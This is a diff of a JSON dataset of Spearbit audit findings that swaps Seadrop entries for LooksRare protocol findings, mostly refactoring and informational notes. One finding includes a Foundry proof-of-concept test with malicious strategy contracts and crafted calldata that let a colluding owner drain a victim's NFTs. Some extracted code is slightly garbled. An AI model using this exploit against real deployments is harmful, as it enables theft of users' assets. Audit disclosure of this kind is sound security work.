Thus implicitly one can deduce that the Chainlink floor strategies are only implemented for ERC721 tokens. Other strategies condition the amounts based on the assetType: assetType == 0 (ERC721) collections can only have 1 as a valid amount; assetType == 1 (ERC1155) collections can only have a non-zero number as a valid amount. If in the future Chainlink or another token-price-feed adds support for some ERC1155 collections, one cannot use the current floor strategies to fulfill an order with an amount greater than 1.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": ".length should not be looked up in every loop of a for-loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Reading an array's length at each iteration of a loop consumes more gas than necessary.", + "title": "itemIds and amounts are redundant fields for takerXxx struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Taker is the entity that initiates the calls to LooksRareProtocol's 3 order execution endpoints. Most implemented strategies (which are fixed/chosen by the maker through signing the makerXxx which includes the strategyId) require the itemIds and amounts fields for the maker and the taker to mirror each other. M_i^j: the j-th element of maker's itemIds fields (the struct would be either MakerBid or MakerAsk depending on the context) M_a^j: the j-th element of maker's amounts fields (the struct would be either MakerBid or MakerAsk depending on the context) T_i^j: the j-th element of taker's itemIds fields (the struct would be either TakerBid or TakerAsk depending on the context) T_a^j: the j-th element of taker's amounts fields (the struct would be either TakerBid or TakerAsk depending on the context) Borrowing notations also from: "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies" InheritedStrategy: T_i^j = M_i^j, T_a^j = M_a^j. StrategyDutchAuction: T_i^j = M_i^j, T_a^j = M_a^j, taker can send extra itemIds and amounts but they won't be used. StrategyUSDDynamicAsk: T_i^j = M_i^j, T_a^j = M_a^j, taker can send extra itemIds and amounts but they won't be used. StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: T_i^0 = M_i^0, T_a^0 = M_a^0 = 1, taker can send extra itemIds and amounts but they won't be used. StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: T_a^0 = M_a^0 = 1, maker's itemIds are unused. StrategyCollectionOffer: T_a^0 = M_a^0, maker's itemIds are unused and taker's T_a^i for i > 0 are also unused. StrategyItemIdsRange: M_i^0 <= T_i^j <= M_i^1, sum(T_a^j) = M_a^0. For InheritedStrategy, StrategyDutchAuction, StrategyUSDDynamicAsk and StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid, the taker's itemIds and amounts are redundant as they should exactly match the maker's fields. 
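To illustrate the redundancy, a taker-side struct stripped of the mirrored fields could look like the following minimal sketch (hypothetical names, not the protocol's actual structs); strategy-specific data would travel in additionalParameters:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical slimmed-down taker struct: itemIds and amounts are read from
// the maker's signed order instead of being mirrored by the taker.
struct SlimTakerBid {
    address recipient;          // NFT recipient
    uint256 maxPrice;           // taker's price protection
    bytes additionalParameters; // strategy-specific data, e.g. abi.encode(premium)
}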
For the other strategies, one can encode the required parameters in either maker's or taker's additionalParameters fields.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "A storage pointer should be cached instead of computed multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.", + "title": "discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not if discount == 9_999, which has almost the same effect. Note that if discount == 10_000 (setting aside the revert), price = desiredPrice = 0. So, unless the taker (sender of the transaction) has set its takerAsk.minPrice to 0 (maker is bidding for a 100% discount and taker is gifting the NFT), the transaction would revert: if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0 revert AskTooHigh(); }", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Comparing a boolean to a constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value.", + "title": "Restructure executeMultipleTakerBids's input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "executeMultipleTakerBids has the following form function executeMultipleTakerBids( OrderStructs.TakerBid[] calldata takerBids, OrderStructs.MakerAsk[] calldata makerAsks, bytes[] calldata makerSignatures, OrderStructs.MerkleTree[] calldata merkleTrees, address affiliate, bool isAtomic ) For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkleTrees all have the same length. 
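One possible shape for such a restructuring is sketched below (TakerBidBundle is a hypothetical name, and the OrderStructs import path is an assumption): bundling the per-order fields into one array element makes the four lengths equal by construction.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import {OrderStructs} from "contracts/libraries/OrderStructs.sol";

// One element carries everything needed to execute one order, so takerBids,
// makerAsks, makerSignatures and merkleTrees can no longer disagree on length.
struct TakerBidBundle {
    OrderStructs.TakerBid takerBid;
    OrderStructs.MakerAsk makerAsk;
    bytes makerSignature;
    OrderStructs.MerkleTree merkleTree;
}

// function executeMultipleTakerBids(
//     TakerBidBundle[] calldata bundles,
//     address affiliate,
//     bool isAtomic
// ) external payable;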
We can enforce this requirement by definition, if we restructure the input passed to executeMultipleTakerBids.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintAllowedTokenHolder is stored in a uint40 (after this audit uint32) which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder.", + "title": "Restructure transferBatchItemsAcrossCollections input parameter format", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "transferBatchItemsAcrossCollections has the following form function transferBatchItemsAcrossCollections( address[] calldata collections, uint256[] calldata assetTypes, address from, address to, uint256[][] calldata itemIds, uint256[][] calldata amounts ) where collections, assetTypes, itemIds and amounts are supposed to have the same lengths. One can enforce that by redefining the input parameters and having this invariant enforced by definition.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider replacing minterIfNotPayer parameter to always correspond to the minter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender would be considered as the minter. Otherwise, minterIfNotPayer would be considered as the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well--we recommend calling it minter afterwards.", + "title": "An approved operator can call transferBatchItemsAcrossCollections", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "TransferManager has 3 endpoints that an approved operator can call: transferItemsERC721 transferItemsERC1155 transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: transferItemsERC721, transferItemsERC1155: (address, address, address, uint256[], uint256[]) // transferBatchItemsAcrossCollections: (address[], address[], address, address, uint256[][], uint256[][]) An operator like LooksRareProtocol might have an owner (OL) that can select/add an arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. 
Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the protocol would call the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[]) that, when decoded as (address[], address[], address, address, uint256[][], uint256[][]), would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted parameters | original parameter ; ---------------------------------- -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr 00000000000000000000000000000000000000000000000000000000000000X3 ; from 00000000000000000000000000000000000000000000000000000000000000X4 ; to itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItemsERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which, unless both have length 0, would cause the compiled code to revert due to out of range index access. This is also dependent on if/how the compiler encodes/decodes the calldata and if the compiler would add the bytecodes for the deployed code to revert for OOR accesses (which solc does). This is just a lucky coincidence; otherwise, OL could have exploited this flaw.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "The interface IERC721ContractMetadata does not extend IERC721 interface", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The current interface IERC721ContractMetadata does not include the ERC-721 functions. As a comparison, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface.", + "title": "Shared logic in different StrategyFloorFromChainlink strategies can be refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": " executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid. executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk. Each group of endpoints in the above list shares the exact same logic. The only difference they have is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. 
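A sketch of that refactor (hypothetical names, not the audited code): the shared flow receives the price rule as an internal function parameter, so each endpoint only contributes its own formula and checks.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract FloorStrategySketch {
    function _fixedPremium(uint256 floorPrice, uint256 premium) internal pure returns (uint256) {
        return floorPrice + premium; // checked arithmetic reverts on overflow
    }

    function _basisPointsPremium(uint256 floorPrice, uint256 premium) internal pure returns (uint256) {
        return (floorPrice * (10_000 + premium)) / 10_000;
    }

    // Shared flow: the common validation/execution would live here once; only
    // the desiredPrice computation is supplied by the caller.
    function _sharedFlow(
        uint256 floorPrice,
        uint256 premium,
        function (uint256, uint256) internal pure returns (uint256) priceRule
    ) internal pure returns (uint256 desiredPrice) {
        desiredPrice = priceRule(floorPrice, premium);
    }

    function executeFixedPremium(uint256 floorPrice, uint256 premium) external pure returns (uint256) {
        return _sharedFlow(floorPrice, premium, _fixedPremium);
    }

    function executeBasisPointsPremium(uint256 floorPrice, uint256 premium) external pure returns (uint256) {
        return _sharedFlow(floorPrice, premium, _basisPointsPremium);
    }
}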
function a1() external view returns (...) { (...) = _a1(); // inlined computation of _a1 } function a2() external view returns (...) { (...) = _a2(); // inlined computation of _a2 }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Add unit tests for mintSigned and mintAllowList in SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The only tests for the mintSigned and the mintAllowList functions are fuzz tests.", + "title": "Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Rename a variable with a misleading name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading since _removeFromEnumeration is used also for signer lists, feeRecipient lists, etc.", + "title": "Creator fee amount and recipient calculation can be refactored in ExecutionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The creator fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeStrategyForTakerBid are identical and can be refactored.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "The protocol rounds the fees in the favour of creatorPaymentAddress", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The feeAmount calculation rounds down, i.e., rounds in the favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 and price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings.", + "title": "The owner can set the selector for a strategy to any bytes4 value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). 
Even though the following check exists: if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } there is no measure taken to avoid potential selector collision with other contract types.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The value 0 is currently used as a magic value for maxTokenSupplyForStage to skip the check quantity + currentTotalSupply > maxTokenSupplyForStage. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for additional branching if (maxTokenSupplyForStage != MAGIC_VALUE) as the condition quantity + currentTotalSupply > type(uint).max is never true.", + "title": "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies. Notation: Ti = length of taker's bid (or ask, depending on the context) item ids; Ta = length of taker's bid (or ask) amounts; Mi = length of maker's bid (or ask) item ids; Ma = length of maker's bid (or ask) amounts. InheritedStrategy: Ti = Ta = Mi = Ma StrategyItemIdsRange: Ti <= Ta, Mi = 2, Ma = 1 (related issue) StrategyDutchAuction: Mi <= Ti, Ma <= Ta, Mi = Ma StrategyUSDDynamicAsk: Mi <= Ti, Ma <= Ta, Mi = Ma StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: Mi <= Ti, Ma <= Ta, Mi = Ma = 1 StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk: Ti = 1, Ta = 1, Ma = 1 StrategyCollectionOffer: Ti = 1, 1 <= Ta, Ma = 1 The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bound revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Missing edge case tests on uninitialized AllowList", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The default value for _allowListMerkleRoots[nftContract] is 0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case.", + "title": "Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. 
If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { } revert ManagerSelectorEmpty(); The owner can add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called the provided parameters by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. 60 The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,! 0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 
00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = _signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private 
itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. // it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider naming state variables as public to replace the user-defined getters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Several state variables, for example, mapping(address => PublicDrop) private _publicDrops; but have corresponding getters defined (function getPublicDrop(address have private visibility, nftContract)). Replacing private by public and renaming the variable name can decrease the code. 
There are several examples of the above pattern in the codebase, however we are only listing one here for brevity.", + "title": "viewCreatorFeeInfo can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "viewCreatorFeeInfo includes a low-level staticcall to the collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Use bytes.concat instead of abi.encodePacked for concatenation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat.", + "title": "_verifyMerkleProofOrOrderHash can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_verifyMerkleProofOrOrderHash includes an if/else block that calls into _computeDigestAndVerify with almost the same inputs (only the hash is different).", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Misleading comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;.", + "title": "isOperatorValidForTransfer can be modified to refactor more of the logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision is repeated on all call sites and could be moved into the function itself.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Use i instead of j as an index name for a non-nested for-loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising.", + "title": "Keep maximum allowed number of characters per line to 120.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There are a few long lines in the code base. 
contracts/executionStrategies/StrategyCollectionOffer.sol: 21:2 error max-line-length (current length 127); 27:2 error max-line-length (163); 29:2 error max-line-length (121); 30:2 error max-line-length (121); 67:2 error max-line-length (163); 69:2 error max-line-length (121); 70:2 error max-line-length (121); 118:2 error max-line-length (123); 119:2 error max-line-length (121). contracts/executionStrategies/StrategyDutchAuction.sol: 20:2 error max-line-length (163); 22:2 error max-line-length (121); 23:2 error max-line-length (121); 26:5 warning code-complexity (cyclomatic complexity 9, allowed 7); 70:31 warning not-rely-on-time (avoid time-based decisions in business logic); 85:2 error max-line-length (123); 86:2 error max-line-length (121); 92:5 warning code-complexity (cyclomatic complexity 8, allowed 7). contracts/executionStrategies/StrategyItemIdsRange.sol: 15:2 error max-line-length (142); 20:2 error max-line-length (163); 21:2 error max-line-length (163); 22:2 error max-line-length (121); 23:2 error max-line-length (121); 25:5 warning code-complexity (cyclomatic complexity 12, allowed 7); 100:2 error max-line-length (123); 101:2 error max-line-length (121). contracts/helpers/OrderValidatorV2A.sol: 40:2 error max-line-length (121); 53:2 error max-line-length (121); 225:2 error max-line-length (127); 279:2 error max-line-length (127); 498:24 warning not-rely-on-time; 501:26 warning not-rely-on-time; 511:2 error max-line-length (143); 593:5 warning code-complexity (cyclomatic complexity 9, allowed 7); 662:5 warning code-complexity (cyclomatic complexity 9, allowed 7); 758:5 warning ordering (internal view function can not go after internal pure function, line 727); 830:5 warning code-complexity (cyclomatic complexity 10, allowed 7); 843:17 warning no-inline-assembly; 850:17 warning no-inline-assembly; 906:5 warning code-complexity (cyclomatic complexity 8, allowed 7); 963:5 warning code-complexity (cyclomatic complexity 8, allowed 7). contracts/helpers/ValidationCodeConstants.sol: 17:2 error max-line-length (129); 18:2 error max-line-length (121). contracts/interfaces/ILooksRareProtocol.sol: 160:2 error max-line-length (122). contracts/libraries/OrderStructs.sol: 12:2 error max-line-length (292); 18:2 error max-line-length (292); 23:2 error max-line-length (127); 49:5 warning ordering (struct definition can not go after state variable declaration, line 26); 81:2 error max-line-length (128); 144:2 error max-line-length (131). 49 problems (34 errors, 15 warnings)", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Avoid duplicating code for consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The _checkActive function is used in every mint function besides mintPublic where the code is almost the same.", + "title": "avoid transferring in _transferFungibleTokens when sender and recipient are equal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one such check outside of _transferFungibleTokens, when one wants to transfer to an affiliate. But if the bidUser is the creator, the ask recipient or the protocolFeeRecipient, the check is missing.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "restrictFeeRecipients is always true for either PublicDrop or 